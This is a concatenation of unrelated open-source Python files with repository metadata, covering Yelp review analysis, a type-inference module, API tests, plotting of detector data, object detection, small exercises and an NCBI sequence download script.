#print(coefficients)
pos_coefficients = np.argsort(coefficients)[-10:]
neg_coefficients = np.argsort(coefficients)[:10]
combine = np.hstack([neg_coefficients, pos_coefficients])
#print("combine:, ",combine)
#print("coefficients[combine]: ", coefficients[combine])
plt.figure(figsize=(7, 4))
#print("fisnish 1")
colors = ['red' if i < 0 else 'blue' for i in coefficients[combine]]
#print("finish 2")
plt.bar(np.arange(len(coefficients[combine])), coefficients[combine], color=colors)
#print("finish 3")
feature_names = np.array(cvectorizer.get_feature_names())
#print("finish 4")
plt.title('why the restaurant is rated as bad or good ', fontsize=15)
#print("finish 5")
plt.xticks(np.arange(0, 2 * 10), feature_names[combine], rotation=40, ha='right')
#print("finish 6")
plt.show()
#print("finish 7")
#############################helper function#############################
def load_database_data(c, zipcode, business_name_input):
c.execute('''
SELECT b_id,r.review, r.r_stars
FROM business, review_fact_table r
WHERE postal_code = ? AND name = ? AND r.business_id = b_id''', (zipcode, business_name_input,))
dataframe = pd.DataFrame(data=c.fetchall(), columns=['business_id', 'review', 'rating'])
return dataframe
def select_data(c, zipcode, business_name):
c.execute('''
SELECT DISTINCT(b_id)
FROM business, review_fact_table r
WHERE postal_code = ? AND name = ? AND r.business_id = b_id''', (zipcode, business_name,))
single_df = pd.DataFrame(data=c.fetchall(), columns=['business_id'])
return single_df['business_id'][0]
def fake_ratio(predict, single):
# Load fake results
predicted_fake = predict
# reviews that has only that business id
reviews = predicted_fake[predicted_fake['business_id'] == single]
n = reviews.shape[0]
# print(n)
fake = reviews.groupby('True(1)/Deceptive(0)').count()['Review'][0]
# print(fake)
fake_percentage = fake / n
# print(fake_percentage)
return fake_percentage
##############################main######################################
def main():
#open states and income raw data
zipcode = input("zipcode:")
business_name = input("restaurant name:")
print(zipcode,business_name)
conn = sqlite3.connect('yelp.db')
c = conn.cursor()
predicted_fake = open_file('data/predicted_review.csv')
# find the business id
single = select_data(c, zipcode, business_name)
# print(single)
fake_review_ratio = fake_ratio(predicted_fake,single)
print(fake_review_ratio)
#top_words(single, predicted_fake)
bigram(single, predicted_fake)
#if __name__=="__main__":
#main()
main()
|
zzhang83/Yelp_Sentiment_Analysis
|
Scripts/UI.py
|
UI.py
|
py
| 6,335 |
python
|
en
|
code
| 20 |
github-code
|
6
|
71568070268
|
nums = []
user_input = input('Enter numbers: ')
while (user_input != 'exit'):
nums.append(user_input)
user_input = input('Enter numbers: ')
#tokens = user_input.split() # converts numbers to string
# # Convert strings to integers
# nums = []
# for token in tokens:
# nums.append(token)
print(nums)
#
# # Print each position and number
print()
for pos, val in enumerate(nums):
print('{}: {}'.format(pos, val))
#
# # Change negative values to 0
for pos in range(len(nums)):
if int(nums[pos]) < 0:
nums[pos] = 0
# Print new numbers
print('New numbers: ')
for num in nums:
print(num, end=' | ')
print()
nums1 = [50, 10, -5, -4, 6]
for i in range(len(nums1)):
if nums1[i] < 0:
nums1[i] = 0
print("nums1:", nums1)
|
Git-Pierce/Week8
|
ModifyList.py
|
ModifyList.py
|
py
| 757 |
python
|
en
|
code
| 0 |
github-code
|
6
|
27624326992
|
import ast
import logging
from util import cname, slice_range, node_is_int, valid_int_slice
from errors import TypeUnspecifiedError
from ptype import PType
from settings import DEBUG_INFER
# Need to use this form to resolve circular import.
import check
int_t = PType.int()
float_t = PType.float()
bool_t = PType.bool()
str_t = PType.string()
unicode_t = PType.unicode()
unit_t = PType.unit()
log = None
def i_debug(s, cond=True):
log.debug(s, DEBUG_INFER and cond)
def call_function(fun_name, *args, **kwargs):
return globals()[fun_name](*args, **kwargs)
def env_get(env, var_id):
"""
Look up the PType stored for identifier `var_id` in type environment
`env`. Returns a PType. Raises `TypeUnspecifiedError` if `env` does not
contain `var_id`.
- `env`: dictionary mapping strings to PTypes.
- `var_id`: string representing identifier.
"""
# make sure the variable is in the environment
if var_id not in env:
i_debug("Type of %s not found in %s" % (var_id, env))
raise TypeUnspecifiedError(var=var_id,env=env)
# return the type stored in the environment
return env[var_id]
def infer_expr(e, env):
"""
Use limited type inference to determine the type of AST expression `e` under
type environment `env`.
"""
assert isinstance(e, ast.expr), \
"Should be inferring type of an expr node, not a " + cname(e)
n = get_infer_expr_func_name(e.__class__.__name__)
# If we get a KeyError, then we're trying to infer the type of an AST node
# that is not in the very limited subset of the language that we're trying
# to perform type inference on.
return call_function(n, e, env)
def get_infer_expr_func_name(expr_type):
return "infer_%s_expr" % expr_type
def infer_Num_expr(num, env):
"""
Determine the type of AST `Num` expression under type environment `env`.
`ast.Num`
- `n`: the numeric literal (as a Python object)
"""
assert num.__class__ is ast.Num
n = num.n
if type(n) is int:
# (int) assignment rule.
return int_t
elif type(n) is float:
# (flt) assignment rule.
return float_t
else:
# No type assignment rule found.
return None
def infer_Str_expr(s, env):
"""
Determine the type of AST `Str` expression under type environment `env`.
`ast.Str`
- `s`: the string literal (as a Python object)
"""
assert s.__class__ is ast.Str
the_string = s.s
if type(the_string) is str:
# (str) assignment rule.
return str_t
elif type(the_string) is unicode:
# (ustr) assignment rule.
return unicode_t
else:
        # No type assignment rule found.
return None
def infer_Name_expr(name, env):
"""
Determine the type of AST `Name` expression under type environment `env`.
`ast.Name`
- `id`: the identifier (as a Python `str`)
- `ctx`: the context (e.g., load, store) in which the expr is used
The AST treats `True` and `False` as Name nodes with id of `"True"` or
`"False"`, strangely enough.
"""
assert name.__class__ is ast.Name
id_str = name.id
if id_str == 'True' or id_str == 'False':
# (bool) assignment rule.
return bool_t
elif id_str == 'None':
# (none) assignment rule.
return unit_t
else:
# (idn) assignment rule.
return env_get(env, id_str)
def infer_List_expr(lst, env):
"""
Determine the type of AST `List` expression under type environment `env`.
`ast.List`
- `elts`: Python list of contained expr nodes
- `ctx': context of the expr (e.g., load, store)
"""
assert lst.__class__ is ast.List
elts_list = lst.elts
first_type = infer_expr(elts_list[0], env)
if all(check.check_expr(e, first_type, env) for e in elts_list[1:]):
# (lst) assignment rule.
return PType.list(first_type)
else:
# No assignment rule found.
return None
def infer_Tuple_expr(tup, env):
"""
Determine the type of AST `Tuple` expression under type environment `env`.
`ast.Tuple`
- `elts`: Python list of contained expr nodes
- `ctx`: context of the expr (e.g., load, store)
"""
assert tup.__class__ is ast.Tuple
elts_list = tup.elts
if all(infer_expr(e, env) != None for e in elts_list):
# (tup) assignment rule.
return PType.tuple([infer_expr(e, env) for e in elts_list])
else:
# No assignment rule found.
return None
def infer_Subscript_expr(subs, env):
"""
Determine the type of AST `Subscript` expression under type environment
`env`.
`ast.Subscript`
- `value`: the collection being subscripted
- `slice`: `ast.Index` or `ast.Slice`
+ `value`: expr used as index (if `ast.Index`)
+ `lower`: expr used as lower bound (if `ast.Slice`)
+ `upper`: expr used as upper bound (if `ast.Slice`)
+ `step`: expr used as step (if `ast.Slice`)
We can only subscript tuples with numeric literals because the inference
algorithm needs to actually know the values of the subscript parameters.
"""
assert subs.__class__ is ast.Subscript
col = subs.value
col_t = infer_expr(col, env)
is_index = subs.slice.__class__ is ast.Index
is_slice = subs.slice.__class__ is ast.Slice
assert is_index or is_slice
# Store the attributes of the slice.
if is_index:
i = subs.slice.value
else: # is_slice
l = subs.slice.lower
u = subs.slice.upper
s = subs.slice.step
if col_t is None:
# If we can't assign a type to the collection, then we can't assign a
# type to its subscript.
return None
# String subscripting
elif col_t == str_t or col_t == unicode_t:
if is_index and infer_expr(i, env) == int_t:
# (sidx) assignment rule.
return col_t
elif is_slice and valid_int_slice(l, u, s, env):
# (sslc) assignment rule.
return col_t
else:
# No assignment rule found.
return None
# List subscripting
elif col_t.is_list():
if is_index and check.check_expr(i, int_t, env):
# (lidx) assignment rule.
return col_t.elt
elif is_slice and valid_int_slice(l, u, s, env):
# (lslc) assignment rule.
return col_t
else:
# No assignment rule found.
return None
# Tuple subscripting
elif col_t.is_tuple():
col_ts = col_t.elts
n = len(col_ts)
if is_index and node_is_int(i) and -n <= i.n < n:
# (tidx) assignment rule.
return col_ts[i.n]
elif is_slice:
rng = slice_range(l, u, s, len(col_ts))
if rng is not None:
# (tslc) assignment rule.
return PType.tuple([col_ts[i] for i in rng])
else:
# No assignment rule found.
return None
else:
# No assignment rule found.
return None
else:
# No assignment rule found.
return None
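# --- Minimal smoke test (illustrative; not part of the original module) ------
# Assumes the sibling modules (check, ptype, errors, util, settings) are
# importable and a Python 2 style runtime where integer literals parse to
# `ast.Num`, matching the handlers above.
if __name__ == "__main__":
    node = ast.parse("42", mode="eval").body  # an ast.Num node for the literal 42
    assert infer_expr(node, {}) == int_t      # the (int) assignment rule applies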
|
jruberg/Pyty
|
src/infer.py
|
infer.py
|
py
| 7,283 |
python
|
en
|
code
| 5 |
github-code
|
6
|
18659256455
|
import asyncpg
from app.main import create_app
from app.settings import Settings
from tests.test_currencies import test_currencies_success
settings = Settings()
async def test_rate_success(aiohttp_client, loop):
currencies = await test_currencies_success(aiohttp_client, loop)
currency = currencies['results']['currencies'][0]['id']
client = await aiohttp_client(create_app)
conn = await asyncpg.connect(settings.dsn)
try:
resp = await client.get(f'/rate/{currency}/')
assert resp.status == 200
result = await resp.json()
assert 'current_rate' in result
assert 'avg_volume' in result
resp = await client.get(f'/rate/?id={currency}')
assert resp.status == 200
result = await resp.json()
assert 'current_rate' in result
assert 'avg_volume' in result
finally:
await conn.close()
async def test_rate_not_found(aiohttp_client, loop):
curency_name = 'BCH'
client = await aiohttp_client(create_app)
conn = await asyncpg.connect(settings.dsn)
try:
currency = await conn.fetchval('select id from currency where name=$1', curency_name)
await conn.execute('delete from currency where name=$1', curency_name)
resp = await client.get(f'/rate/{currency}/')
assert resp.status == 404
result = await resp.json()
assert 'error' in result
assert 'detail' in result
assert 'not found transaction' == result['detail']
finally:
await conn.close()
async def test_rate_error(aiohttp_client, loop):
curency_name = 'BCH'
client = await aiohttp_client(create_app)
resp = await client.get(f'/rate/{curency_name}/')
assert resp.status == 400
|
ridhid/test_aio
|
tests/test_rate.py
|
test_rate.py
|
py
| 1,745 |
python
|
en
|
code
| 0 |
github-code
|
6
|
39180591311
|
# function program 1
def funadd(e,f):
a=10
b=10
print("e:",e,"f:",f)
print(a+b)
return a+b,e+f
def funsub():
a=20
b=10
print(a-b)
c,d=funadd(4,8)
ff,dd=funadd(14,18)
print("c value:",c)
print("d value:",d)
funsub()
|
sameerCoder/pycc_codes
|
function_basic1_jan2020.py
|
function_basic1_jan2020.py
|
py
| 272 |
python
|
en
|
code
| 2 |
github-code
|
6
|
426288510
|
entered_string = input('Please enter the string: ')
def string_operations(text):
third_symbol = text[2]
print('Third symbol of this string: {}'.format(third_symbol))
penultimate = text[-2]
print('Penultimate character of this string: {}'.format(penultimate))
first_five = text[:5]
print('First five characters of this string: {}'.format(first_five))
without_last_two = text[:-2]
print('The entire string except the last two characters: {}'.format(without_last_two))
even_indices = text[::2]
print('All characters with even indices (assuming that indexing starts at 0,'
' so characters are output starting from the first one).: {}'.format(even_indices))
odd_indices = text[1::2]
print('All characters with odd indices, that is,'
' starting from the second character of the string.: {}'.format(odd_indices))
reverse_order = text[::-1]
print('All characters in reverse order.: {}'.format(reverse_order))
reverse_from_last_one = text[-1::-2]
print('All the characters of the string one by one in reverse order,'
' starting with the last one.: {}'.format(reverse_from_last_one))
length_of_the_string = len(text)
print('The length of this string.: {}'.format(length_of_the_string))
string_operations(entered_string)
|
YanaSharkan/Homework
|
lesson_4_hw_3/task_5_process_string.py
|
task_5_process_string.py
|
py
| 1,317 |
python
|
en
|
code
| 0 |
github-code
|
6
|
17510551183
|
'''
2 ways:
1. consider all substrings, and use memoization to not reconsider substrings
leetcode
^
abcd
a bcd ab cd abc d abcd .
/ | \
b cd bc d bcd .
n = s.length
helper(mid = 1)
function helper(mid)
if mid == n:
return True
#s = orig-s[mid:]
for idx in [mid ... n]
if s.substring(0..idx) and helper(idx)
return True
return False
2. iteratively get the answer of whether s[i] can be segmented until i = n - 1
tabulation
table[i] = substring[i]
abcde
00 = t
01 = t/f
02 = 01? and 2 = F
03 = 02F
0n
f[0] = true
for cvc = 1 .. n
for k = 0 .. cvc
        f[cvc] = f[cvc] or ( s.substring(k, cvc) in dict and f[k])
return f[n]
'''
from typing import List


class Solution:
def wordBreak(self, s: str, wordDict: List[str]) -> bool:
n = len(s)
f = [False] * (n + 1)
words = set(wordDict)
f[0] = True
for cvc in range(1, n + 1): # 3 [_ _ _]
for k in range(cvc+1): # 0 .. 3 --> 0, 1
f[cvc] = f[cvc] or (s[k:cvc] in words and f[k])
return f[n]
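# Quick sanity check of the tabulation above (classic examples; illustrative
# only and safe to delete):
if __name__ == "__main__":
    assert Solution().wordBreak("leetcode", ["leet", "code"]) is True
    assert Solution().wordBreak("catsandog", ["cats", "dog", "sand", "and", "cat"]) is False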
|
soji-omiwade/cs
|
dsa/before_rubrik/wordbreak_with_tabulation.py
|
wordbreak_with_tabulation.py
|
py
| 1,195 |
python
|
en
|
code
| 0 |
github-code
|
6
|
24113556949
|
from sys import stderr
from tourney import *
ENGINE = './erastus -i 10000 -w 4'
SCORE_THRESHOLD = .2
START = '0000000000000000000000000xxxxxxxx1'
def puzzle_search():
engine = Engine(ENGINE)
state = START
while 1:
action, log = engine.run(state)
stderr.write('.')
stderr.flush()
top_score = None
for line in log.split('\n'):
if not line.startswith('alt'):
continue
_, score, _ = line.split()
score = float(score)
            if top_score is None:
top_score = score
if top_score != 1:
break
else:
diff = top_score - score
if diff >= SCORE_THRESHOLD:
print(f'https://erastus.schneiderbox.net/#{state}\t({diff})')
break
state = move_state(state, action)
if action_count(state) == 0:
stderr.write('\n')
state = START
if __name__ == '__main__':
puzzle_search()
|
richardjs/erastus
|
src/puzzlesearch.py
|
puzzlesearch.py
|
py
| 1,059 |
python
|
en
|
code
| 1 |
github-code
|
6
|
23404494402
|
"""Test the concurrency module."""
from typing import Any
import pytest
from rtasr.concurrency import ConcurrencyHandler, ConcurrencyToken
class TestConcurrencyToken:
"""Test the ConcurrencyToken class."""
@pytest.mark.parametrize("value", [None, "string", True, False, [], {}])
def test_concurrency_token_invalid(self, value: Any) -> None:
"""Test the concurrency token with invalid values."""
with pytest.raises(TypeError):
ConcurrencyToken(value)
@pytest.mark.parametrize("value", [0, 1, 2, 1.0, 2.0])
def test_concurrency_token_valid(self, value: int) -> None:
"""Test the concurrency token."""
token = ConcurrencyToken(value=value)
assert token.value == value
class TestConcurrencyHandler:
"""Test the ConcurrencyHandler class."""
@pytest.mark.asyncio
async def test_concurrency_handler_with_limit(self) -> None:
"""Test the concurrency handler with a limit."""
limit = 5
concurrency_handler = ConcurrencyHandler(limit)
assert hasattr(concurrency_handler, "limit")
assert hasattr(concurrency_handler, "queue")
assert concurrency_handler.limit == limit
assert concurrency_handler.queue.maxsize == limit
tokens = []
for _ in range(limit):
token = await concurrency_handler.get()
assert isinstance(token, ConcurrencyToken)
tokens.append(token)
# Queue should be empty now
assert concurrency_handler.queue.empty()
for token in tokens:
concurrency_handler.put(token)
# Queue should be refilled
for _ in range(limit):
token = await concurrency_handler.get()
assert isinstance(token, ConcurrencyToken)
@pytest.mark.asyncio
async def test_concurrency_handler_without_limit(self) -> None:
"""Test the concurrency handler without a limit."""
concurrency_handler = ConcurrencyHandler(limit=None)
token = await concurrency_handler.get()
assert token is None
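# --- Usage sketch (illustrative only, not part of the test suite) ------------
# How a caller might bound concurrent work with the handler exercised above.
# The coroutine name and the body of the `try` block are hypothetical.
#
# async def bounded_call(handler: ConcurrencyHandler) -> None:
#     token = await handler.get()   # waits while all `limit` tokens are checked out
#     try:
#         ...                       # perform the rate-limited work here
#     finally:
#         if token is not None:     # with limit=None, get() returns None
#             handler.put(token)    # return the token so other tasks can proceed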
|
Wordcab/rtasr
|
tests/test_concurrency.py
|
test_concurrency.py
|
py
| 2,077 |
python
|
en
|
code
| 5 |
github-code
|
6
|
14629235583
|
import numpy as np
import time
import os
import sys
from scipy.stats import poisson, binom
from scipy.special import erf as erf
from admin import make_glob_array
import multiprocessing
# from Sim_show import Sim_fit
import matplotlib.pyplot as plt
from mpl_toolkits import mplot3d
import matplotlib.colors as mcolors
from make_3D import make_3D
pmts=np.array([0,1,4,6,7,3,10,13,15,17,18,5,11,12,14])
path='/home/gerak/Desktop/DireXeno/011220/'
data=np.load(path+'h.npz')
Angs=data['Angs']
Angs10=data['Angs10']
Angsbins=data['Angsbins']
H=data['H']
G=data['G']
Spectrum=data['spectrum']
Sbins=data['Sbins']
Spectra=np.transpose(data['spectra'], (2,0,1))
sbins=data['sbins']
FSbins=data['FSbins']
FullSpectrum=data['Fullspectrum']
w=data['W']
Wbins=data['Wbins']
Wbands=data['Wbands']
Sbands=data['Sbands']
W20_40=data['W20_40']
W20_40bins=data['W20_40bins']
data=np.loadtxt(path+'NRel.txt')
NDep=[]
NSpec=[]
for i in range(len(data)):
NDep.append(data[i][0])
NSpec.append(data[i][1])
NSpec=NSpec/np.sum(NSpec)
N=10
data=np.load('Q.npz')
ls=data['ls']
Sspectrum=data['Ravel_Spectrum'].reshape((N, 1, np.shape(Spectrum)[0]))[:,0]
Sspectra=data['Ravel_Spectra'].reshape((N, 1, np.shape(Spectra)[0], np.shape(Spectra)[1], np.shape(Spectra)[2]))[:,0]
SG=data['Ravel_G'].reshape((N, 1, np.shape(G)[0], np.shape(G)[1], np.shape(G)[2]))[:,0]
SH=data['Ravel_H'].reshape((N, 1, np.shape(H)[0], np.shape(H)[1], np.shape(H)[2], np.shape(H)[3]))[:,0]
SAngs=data['Ravel_Angs'].reshape((N, 1, np.shape(Angs)[0], np.shape(Angs)[1]))[:,0]
SFullspectrum=data['Ravel_Fullspectrum'].reshape((N, 1, np.shape(FullSpectrum)[1]))[:,0]
SW=data['Ravel_W'].reshape((N, 1, np.shape(w)[0]))[:,0]
keVbins=data['keVbins']
PEbins=data['PEbins']
keVPE=data['Ravel_KeVPE'].reshape((N, len(keVbins)-1, len(PEbins)-1))
y=np.arange(0, 600)
y1=data['adn']*y+data['bdn']
y2=data['aup']*y+data['bup']
plt.figure()
plt.title('Energy spectrum')
plt.step(NDep, NSpec, where='mid')
# plt.yscale('log')
plt.figure(figsize=(20,10))
X, Y= np.meshgrid(0.5*(keVbins[1:]+keVbins[:-1]), 0.5*(PEbins[1:]+PEbins[:-1]))
plt.pcolor(Y, X, np.mean(keVPE, axis=0), norm=mcolors.PowerNorm(0.3))
plt.plot(y, y1, 'k--', label='{}x+{}'.format(np.round(data['adn'],decimals=2), np.round(data['bdn'],decimals=2)), linewidth=5)
plt.plot(y, y2, 'k--', label='{}x+{}'.format(np.round(data['aup'],decimals=2), np.round(data['bup'],decimals=2)), linewidth=5)
plt.xlabel('PEs', fontsize=25)
plt.ylabel('keV', fontsize=25)
plt.tick_params(axis='both', which='major', labelsize=20)
cbar=plt.colorbar()
cbar.ax.tick_params(labelsize=25)
plt.legend(fontsize=35, loc='upper right')
plt.xlim(0, np.amax(PEbins))
plt.ylim(0, np.amax(keVbins))
plt.figure()
plt.title('W')
plt.bar(0.5*(Wbins[1:]+Wbins[:-1]), w, width=Wbins[1:]-Wbins[:-1], color='r', alpha=0.5)
plt.errorbar(0.5*(Wbins[1:]+Wbins[:-1]), np.mean(SW, axis=0), np.std(SW, axis=0), fmt='.')
for i in range(len(Wbands)):
plt.axvline(Wbands[i], 0, 1)
plt.yscale('log')
#
plt.figure()
plt.title('Full Spectrum')
plt.step(0.5*(FSbins[1:]+FSbins[:-1]), np.sum(FullSpectrum, axis=0), where='mid')
for i in range(len(Wbands)-1):
plt.bar(0.5*(FSbins[1:]+FSbins[:-1]), FullSpectrum[i], width=FSbins[1:]-FSbins[:-1], label='spectrum', alpha=0.5)
plt.errorbar(0.5*(FSbins[1:]+FSbins[:-1]), np.mean(SFullspectrum, axis=0), np.std(SFullspectrum, axis=0), fmt='.', label='A')
plt.yscale('log')
plt.legend()
plt.figure()
plt.title('Global Spectrum')
plt.bar(0.5*(Sbins[1:]+Sbins[:-1]), Spectrum, width=Sbins[1:]-Sbins[:-1], label='spectrum', color='r', alpha=0.5)
plt.errorbar(0.5*(Sbins[1:]+Sbins[:-1]), np.mean(Sspectrum, axis=0), np.std(Sspectrum, axis=0), fmt='.', label='A')
plt.legend()
plt.yscale('log')
t=np.arange(100)
fig, ax=plt.subplots(2,3)
for k in range(len(Sbands)-1):
#plt.title('The temporal structure in different energy ranges (NRs) {}-{}'.format(Sbands[k], Sbands[k+1]), fontsize=35)
data=np.ravel(G[k])
model=np.ravel(np.mean(SG[:,k], axis=0))
N=np.sum(np.sum(G[k].T*np.arange(np.shape(G)[1]), axis=1)/np.sum(G[k], axis=0))
np.ravel(ax)[k].step(t, (np.sum(G[k].T*np.arange(np.shape(G)[1]), axis=1)/np.sum(G[k], axis=0))/N, where='mid', label='PEs: {}-{}'.format(Sbands[k], Sbands[k+1]), linewidth=3)
np.ravel(ax)[k].errorbar(t, np.mean(np.sum(np.transpose(SG[:,k], (0,2,1))*np.arange(np.shape(G)[1]), axis=-1)/np.sum(SG[:,k], axis=1), axis=0)/N,
np.std(np.sum(np.transpose(SG[:,k], (0,2,1))*np.arange(np.shape(G)[1]), axis=-1)/np.sum(SG[:,k], axis=1), axis=0)/N, fmt='.', label='{}'.format(-np.sum(data*np.log((model+1e-10)/(data+1e-10))+data-model)))
np.ravel(ax)[k].legend(fontsize=10)
np.ravel(ax)[k].set_yscale('log')
# plt.xlabel('Time [ns]', fontsize=35)
# plt.ylabel('The probability to resolve a PE /\naveage number of PEs at\n the energy range', fontsize=35)
# plt.ylabel('The average number of\nPEs resolved (normalized)', fontsize=35)
# plt.tick_params(axis='both', which='major', labelsize=20)
# plt.show()
# for k in range(len(Sbands)-1):
# fig, ax=plt.subplots(4,4)
# fig.suptitle('PMT spectra ({}-{})'.format(Sbands[k], Sbands[k+1]))
# for i in range(15):
# np.ravel(ax)[i].step(0.5*(sbins[1:]+sbins[:-1]), Spectra[k,:,i], where='mid', label='A')
# np.ravel(ax)[i].errorbar(0.5*(sbins[1:]+sbins[:-1]), np.mean(Sspectra[:,k,:,i], axis=0), np.std(Sspectra[:,k,:,i], axis=0), fmt='.', label='A')
# np.ravel(ax)[i].legend()
# np.ravel(ax)[i].set_yscale('log')
# for k in range(len(Sbands)-1):
for k in range(1):
fig, ax=plt.subplots(4,4)
fig.suptitle('PMT temporal ({}-{})'.format(Sbands[k], Sbands[k+1]))
for i in range(15):
np.ravel(ax)[i].step(t, np.sum(H[k, :,:,i].T*np.arange(np.shape(H)[1]), axis=1)/np.sum(H[k, :,:,i], axis=0), where='mid', label='PMT{}'.format(pmts[i]))
# np.ravel(ax)[i].errorbar(t, np.mean(np.sum(np.transpose(SH[k,:,:,:,i], (0,2,1))*np.arange(np.shape(H)[1]), axis=-1)/np.sum(SH[k,:,:,:,i], axis=1), axis=0),
# np.std(np.sum(np.transpose(SH[k,:,:,:,i], (0,2,1))*np.arange(np.shape(H)[1]), axis=-1)/np.sum(SH[k,:,:,:,i], axis=1), axis=0), fmt='.')
np.ravel(ax)[i].set_yscale('log')
np.ravel(ax)[i].legend()
plt.show()
|
gerakolt/DireXeno
|
fit/show.py
|
show.py
|
py
| 6,250 |
python
|
en
|
code
| 0 |
github-code
|
6
|
22676158140
|
import cv2
import matplotlib.pyplot as plt
import numpy as np
import selectivesearch
from predictors import resnet152
from utils import selectors, nms
import xml.etree.ElementTree as ET
import random
boxes = {}
def getImgReady(img, show=False):
if img is None:
return None
if show:
plt.imshow(img)
plt.axis('off')
# convert into format (batch, RGB, width, height)
img = cv2.resize(img, (224, 224))
img = np.swapaxes(img, 0, 2)
img = np.swapaxes(img, 1, 2)
img = img[np.newaxis, :]
return img
def addBox(x, y, w, h, prob, label):
x1 = x
x2 = x + w
y1 = y
y2 = y + h
    if label not in boxes:  # dict.has_key() was removed in Python 3
boxes[label] = [[x1, y1, x2, y2, prob]]
else:
boxes[label].append([x1, y1, x2, y2, prob])
def drawGroundTruth(imgName, img):
xmlTree = ET.parse(annotationsDir + '{}.xml'.format(imgName.split('.')[0])) # reads corresponding XML file
for object in xmlTree.findall('object'):
name = object.find('name').text
name = nameDict[name]
bndbox = object.find('bndbox')
xmin = int(float(bndbox.find('xmin').text)) #reads coordinates
ymin = int(float(bndbox.find('ymin').text))
xmax = int(float(bndbox.find('xmax').text))
ymax = int(float(bndbox.find('ymax').text))
rect = plt.Rectangle((xmin, ymin), xmax - xmin, ymax - ymin,
fill=False, edgecolor=(0, 1, 0), linewidth=3.5)
plt.gca().add_patch(rect)
plt.gca().text(xmin, ymin - 2, 'Ground Truth:{:s}'.format(name),
bbox=dict(facecolor=(0, 1, 0), alpha=0.5), fontsize=12, color='white')
def getNameDict(filename):
dic = {}
with open(filename, 'r') as f:
lines = f.readlines()
for line in lines:
line = line.strip('\n')
key = line.split(' ')[0]
val = line.split(' ')[1]
dic[key] = val
return dic
annotationsDir = '../Data/ImageNet/ILSVRC2012/val-Annotations/'
imgsDir = '../Data/ImageNet/ILSVRC2012/img_val/'
nameDict = getNameDict('../synset.txt')
imgName = selectors.selectImg(imgsDir)
imgPath = imgsDir + imgName
img = cv2.cvtColor(cv2.imread(imgPath), cv2.COLOR_BGR2RGB)
plt.figure(imgName.split('.')[0])
plt.imshow(img)
plt.axis('off')
img_label, regions = selectivesearch.selective_search(img, scale = 500, sigma = 0.9, min_size = 500)
for i, region in enumerate(regions): #rect:x y w h
x = region['rect'][0]
y = region['rect'][1]
w = region['rect'][2]
h = region['rect'][3]
croppedImg = img[y:y + h,x:x + w]
croppedImg = getImgReady(croppedImg)
prob, label = resnet152.predict(croppedImg)
if prob < 0.2: #ignore low probability boxes
continue
addBox(x, y, w, h, prob, label)
for label in boxes:
color = (random.random(), random.random(), random.random())
indexes = nms.nms(np.array(boxes[label]), 0.3)
for i in indexes:
x1 = boxes[label][i][0]
y1 = boxes[label][i][1]
x2 = boxes[label][i][2]
y2 = boxes[label][i][3]
prob = boxes[label][i][4]
rect = plt.Rectangle((x1, y1), x2 - x1, y2 - y1,
fill=False, edgecolor=color, linewidth=3.5)
plt.gca().add_patch(rect)
plt.gca().text(x1, y1 - 2, '{:s} {:.3f}'.format(label, prob),
bbox=dict(facecolor=color, alpha=0.5), fontsize=12, color='white')
drawGroundTruth(imgName, img)
plt.show()
|
juvu/ImageSearch
|
test/testPredictorInterface.py
|
testPredictorInterface.py
|
py
| 3,482 |
python
|
en
|
code
| null |
github-code
|
6
|
15393426988
|
# -*- coding:utf-8 -*-
class Solution:
def GetLeastNumbers_Solution(self, tinput, k):
# write code here
        if len(tinput) < k or k <= 0:  # note the extra condition: k must not be 0
return []
length = len(tinput)
start = 0
end = length - 1
index = self.partition(tinput, length, start, end)
while index != (k-1):
            if index > k-1:  # pivot landed past k-1: re-partition the left part (start..index-1)
end = index - 1
index = self.partition(tinput, length, start, end)
            else:  # everything before start is already in place, but start..k is not yet partitioned
start = index + 1
index = self.partition(tinput, length, start, end)
return sorted(tinput[:k])
def partition(self, data, length, start, end):
temp = data[start]
while start < end:
while start < end and data[end] >= temp:
end -= 1
data[start] = data[end]
while start < end and data[start] <= temp:
start += 1
            data[end] = data[start]  # move the element larger than temp to position end
data[start] = temp
return start
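# Example (hypothetical input): the 4 smallest elements of [4, 5, 1, 6, 2, 7, 3, 8]
# are returned in sorted order:
#   Solution().GetLeastNumbers_Solution([4, 5, 1, 6, 2, 7, 3, 8], 4)  # -> [1, 2, 3, 4]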
|
shakesVan/Playground
|
Nowcoder/40.py
|
40.py
|
py
| 1,206 |
python
|
en
|
code
| 0 |
github-code
|
6
|
31533523826
|
import math
vineyard_sq_m = int(input())
grapes_kg_per_sq_m = float(input())
wine_litres_needed = int(input())
number_workers = int(input())
difference = 0
litres_wine = 0
litres_per_worker = 0
total_grapes = vineyard_sq_m * grapes_kg_per_sq_m
percent_for_wine = 0.4
grapes_for_wine = total_grapes * 0.4
litres_wine = grapes_for_wine / 2.5
difference = abs(litres_wine - wine_litres_needed)
if litres_wine < wine_litres_needed:
print(f"It will be a tough winter! More {math.floor(difference)} liters wine needed.")
elif litres_wine >= wine_litres_needed:
litres_per_worker = difference / number_workers
print(f"Good harvest this year! Total wine: {math.floor(litres_wine)} liters.")
print(f"{math.ceil(difference)} liters left -> {math.ceil(litres_per_worker)} liters per person.")
|
iliyan-pigeon/Soft-uni-Courses
|
programming_basics_python/conditional_statements_more_exercises/harvest.py
|
harvest.py
|
py
| 801 |
python
|
en
|
code
| 0 |
github-code
|
6
|
8190287555
|
#!/usr/bin/env python3
# Get sequences from NCBI.
# To be called from Snakefile.
# Usage: python windows.py <infile> <outfile> <email> <window_size>
import os
import sys
from Bio import Entrez
from Bio import SeqIO
import numpy as np
import pandas as pd
def main():
snpfile = sys.argv[1]
outfile = sys.argv[2]
email = sys.argv[3]
    window_size = int(sys.argv[4])  # CLI arguments arrive as strings
interest = pd.read_csv(
snpfile,
header=0,
dtype={"chrom": str, "center": np.int64},
)
interest.columns = interest.columns.str.lower().str.replace(" ", "_")
interest[["chrom", "center"]] = (
interest.iloc[:, 0]
.str.replace("_[A-Z]{3}?", "")
.str.replace(" ", "")
.str.split("_", expand=True)
)
    interest = interest.assign(
        start=lambda df: pd.to_numeric(df["center"]) - window_size,
        end=lambda df: pd.to_numeric(df["center"]) + window_size,
    )
interest.index.rename("Index", inplace=True)
summary = pd.read_csv("Data/dmelSummary.csv")
summary.index.rename("Index", inplace=True)
summary.columns = summary.columns.str.lower().str.replace(" ", "_")
seqs = []
Entrez.email = email
for index, row in interest.iterrows():
with Entrez.efetch(
db="nucleotide",
id=summary.loc[summary["name"] == row["chrom"], "refseq"].iat[0],
rettype="fasta",
strand=1,
seq_start=row["start"],
seq_stop=row["end"],
) as handle:
seqs.append(SeqIO.read(handle, "fasta"))
SeqIO.write(seqs, outfile, "fasta")
if __name__ == "__main__":
main()
|
